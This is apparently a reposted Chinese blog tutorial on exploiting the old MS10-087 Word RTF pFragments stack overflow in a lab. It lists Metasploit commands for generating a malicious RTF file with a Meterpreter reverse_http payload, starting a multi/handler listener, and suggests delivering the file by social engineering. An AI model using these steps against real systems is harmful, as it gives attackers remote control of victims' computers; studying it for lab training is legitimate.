基于office渗透(MS10-087 Office(word)渗透攻击)

MS10-087 Office(word)渗透攻击

简介

如果用户打开或预览特制的RTF电子邮件,则最严重的漏洞可能允许远程执行代码。成功利用这些漏洞中的任何一个的攻击者可以获得与本地用户相同的用户权限。与使用管理用户权限进行操作的用户相比,将其帐户配置为在系统上具有较少用户权限的用户受到的影响较小。

低版本的word版本会出现RTF文件漏洞。

漏洞:microsoft word中的RTF分析器中的pFragments属性容易受到栈缓存区溢出攻击

受影响的系统:Microsoft Office XP SP,2003 SP3,2007 SP2,2010 x32,2010 x64,Microsoft Office for

启动msf

命令:msfconsole

img

搜索MS10_087漏洞

命令:search ms10_087

img

使用攻击模块

命令::use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

img

设置恶意文件

命令:set FILENAME ms10087.rtf

img

设置payload

命令:set payload windows/meterpreter/reverse_http

img

设置用于接受从目标机弹回的shell

img

开始攻击

命令:run

img

将/home/jack/.msf4/local/ms10087.rtf下的文件传到靶机上

现实中我们可以利用社会工程学的知识传到目标机上,在这里我们直接上传上去

进入multi/handler模块

img

设置payload

命令:set payload windows/meterpreter/reverse_http

img

设置用于接受从目标机弹回的shell

img

开始攻击

命令:run

shell

[外链图片转存中…(img-aq7Vliaz-1674722518515)]

开始攻击

命令:run

img

猜你喜欢

转载自blog.csdn.net/qq_62803993/article/details/128766214